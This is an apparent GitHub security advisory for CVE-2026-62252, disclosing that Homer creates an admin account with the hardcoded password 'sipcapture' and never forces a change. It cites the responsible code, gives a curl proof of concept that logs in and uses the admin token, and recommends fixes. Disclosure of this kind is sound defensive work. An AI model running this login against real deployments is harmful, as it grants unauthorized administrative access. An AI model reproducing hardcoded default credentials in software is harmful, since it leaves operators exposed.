CVE-2026-62252: Homer: Hardcoded Default Admin Password 'sipcapture' With No Forced Change on First Login
### Summary On every fresh Homer deployment using internal authentication, the bootstrap process automatically creates an `admin` account with the password `sipcapture` (stored as a legacy SHA-256 hex hash). There is no first-login forced-change mechanism. Any attacker who reaches the login endpoint immediately gains full administrative access. ### Details **`config/config.go` lines 858-861:** ```go // DefaultInternalAuthPasswordHash is the SHA-256 hex digest of the default // bootstrap password (cleartext: sipcapture). const DefaultInternalAuthPasswordHash = "883ffc1f37fd0fe542b0fb9740035c4383e7d976c411161d24e62edace280f90" ``` **`coordinator/services/auth_bootstrap.go` lines 20-71:** `EnsureBootstrapAdminUser()` runs at startup. If no admin user exists, it inserts a row with `username=admin`, `password_hash=DefaultInternalAuthPasswordHash`. No `force_change`, no `first_login` flag, no expiry is set. **`coordinator/services/auth_bootstrap_test.go` line 114** confirms the plaintext: ```go u, err := svc.Authenticate(ctx, "admin", "sipcapture") ``` **`passwordhash/password.go` lines 36-45:** Legacy SHA-256 hex hashes are accepted via `legacySHA256HexEqual`, so the default credential is functional on any deployment. ### PoC ```bash # Authenticate with default credentials — works on any fresh Homer deployment curl -s -X POST http://<homer-host>/api/v3/auth \ -H 'Content-Type: application/json' \ -d '{"username":"admin","password":"sipcapture"}' # Response: {"token":"<admin-jwt>","data":{"userGroup":"admin"}} # Use the token to access all admin functionality curl -H "Authorization: Bearer <admin-jwt>" http://<homer-host>/api/v3/users ``` ### Impact Use of Hard-coded Credentials (CWE-798). Any attacker who can reach a freshly deployed Homer instance gains immediate full administrative access using the publicly documented default password, with no lockout, rate limiting, or forced password change required. ### Fix Remove the hardcoded `DefaultInternalAuthPasswordHash` constant. Require operators to provide a hashed admin password in the configuration file. Alternatively, generate a random password on first startup, print it to stdout once, and immediately force a change on first login. If possible, please apply for a CVE number when posting.
Recommended action
Recommended action
Upgrade affected packages to a patched version: github.com/sipcapture/homer-app 0.0.0-20260625091610-b2e942031ff8.
Technical details
- Vendor
- Not specified
- Product
- github.com/sipcapture/homer-app
- Exploitation
- none known
- Evidence
- official
Evidence and sources
This record is attributed to GitHub Advisories. Exploitation status and remediation guidance are kept separate from the vulnerability's technical severity.
Open primary source